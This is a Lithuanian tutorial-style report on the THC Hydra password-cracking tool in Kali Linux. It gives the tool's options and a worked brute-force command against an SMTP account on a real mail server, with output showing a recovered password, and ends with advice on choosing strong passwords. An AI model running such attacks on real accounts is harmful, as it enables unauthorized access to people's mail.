1. Įžanga.
Kali Linux yra optimizuota Backtrack versija, kuri kaip ir Backtrack yra adaptuota kompiuterinių tinklų saugumo spragų aptikimui ir auditui atlikti. Todėl šioje sistemoje iš karto yra įdiegta eilė įrankių, tokių kaip: aircrack-ng, burpsuite, hydra, john the ripper, maltego, metasploit framework, nmap, sqlmap, wireshark, zaproxy, kurie skirti tinklo saugumo testavimui. Trumpai aprašysiu įrankį esantį Kali Linux „Top 10 Security Tools“, THC Hydra.
2. Įrankis THC Hydra.
Hydra – tai įrankis skirtas „nulaužti“ slaptažodžiams ir yra pritaikomas įvairiems tinklo servisams, tokiems kaip: FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, SMTP ir kiti. Šio įrankio pagalba galima atlikti atakas keliems tinklo servisams iškarto.
3. Programos veikimas ir sintaksė.
Kali Linux įrankių juostoje pasirenkame Applications → Kali Linux → Top 10 Security Tools → Hydra. Hydra. Įrankis įjungtas:
- Kaip ir minėjau anksčiau šis įrankis jau yra Kali Linux sistemoje, todėl papildomai jo nei parsisiųsti, nei įdiegti nereikia.
Prieš pradedant „nulaužinėti“ savo elektroninį paštą, pateikiu įrankio Hydra sintaksę ir komandas. Sintaksė: $ hydra -L FILE] [-p PASS | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
Komandos: -R atkuria nutrūkusią sesiją. -s PORT nurodomas porto numeris. -l (mažoji L) nurodomas vartotojo vardas. -L nurodomi vartotojo vardai iš sąrašo (failo), reikia nurodyti „kelią“ į failo vietą. -р nurodomas slaptažodis. -Р nurodomi vartotojo slaptažodžiai iš sąrašo (failo), reikia nurodyti „kelią“ į failo vietą. -e ns rašoma n jei „laužiama“ be slaptažodžio, s jei su. -C FILE colon seperated "login:pass" format, instead of -L/-P options -M FILE nurodomas sąrašas serverių paralelinei atakai, vienai linijai turi būti ne daugiau kaip vienas serveris, pvz: 123.0.0.0 123.6.8.8. -o FILE nurodoma vieta kur bus įrašyti gauti duomenys, reikia nurodyti „kelią“ į failo vietą. -t TASKS paleisti paralelinę užduotį (host, pagal nutylėjimą: 16). -w TIME nustatomas atsakymo laukimo laikas (pagal nutylėjimą: 30). -v / -V išplėstinis režimas, parodo kiekvieną vartotojo/slaptažodžio kombinaciją.
Taigi, į komandinę eilutę įvedu vartotojo vardą, kelią į slaptažodžių bylą (failą), kurį jau turiu parsisiuntęs, ir nurodau pašto serverio vardą. Komandinėje eilutėje tai atrodo taip: ~$ hydra -l unasone -P '/home/saras/Desktop/pw list 1.txt' smtp.mail.ru smtp Spaudžiu ENTER. Prasideda slaptažodžio parinkimas pašto vartotojui iš interneto atsisiųsto slaptažodžių sąrašo. Pasibaigus slaptažodžių sąrašui, arba radus slaptažodį, komandinėje eilutėje išvedamas rezultatas: Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-21 23:07:35 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] 16 task, 1 server, 18 login try (l:1/p:18), ~1 try per task [DATA] attacking service smtp on port 25 [25][smtp] host: 217.69.139.160 login: unasone password: sa123456 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-21 23:07:37
Šiuo atveju užduotis atlikta teigiamai slaptažodis rastas. Slaptažodis: sa123456.
4. Išvados
Hydra yra tik vienas iš daugelio įrankių šiai dienai sukurtų slaptažodžiui gauti, atspėti, „nulaužti“. Taip pat internetas „pilnas“ slaptažodžių sąrašų, kuriuos gali parsisiūsi kiekvienas. Todėl labai svarbu pasirinkti gerą slaptažodį savo elektroniniam paštui, duomenų bazei ir t.t. Keli patarimai kaip pasirinkti slaptažodį: Prie slaptažodžio nepridekite pavienių simbolių, pavyzdžiui, jonas1; Nedvigubinti žodžių, pavyzdžiui, jonasjonas; Nenaudoti žodžių iš kito galo (alus-sula); Nenaudoti raktų, kurie gali būti lengvai pakartoti, pavyzdžiui, qwert, asdf, asdfghg ir kt. Neišiminėti iš žodžių balsių.
5. Literatūros sąrašas
1. https://exploit.in/forum/index.php?showtopic=68886, Hydra aprašymas, žiūrėta 2015-03-20.
2. http://habrahabr.ru/post/231369/, Hydra aprašymas, žiūrėta 2015-03-20.
3. http://vlsu.blogspot.com/2013/07/kali-linux.html, Hydra aprašymas, žiūrėta 2015-03-20.
4. http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-passwords-with-tamper-data-thc-hydra-0155374/, Hydra aprašymas, žiūrėta 2015-03-20.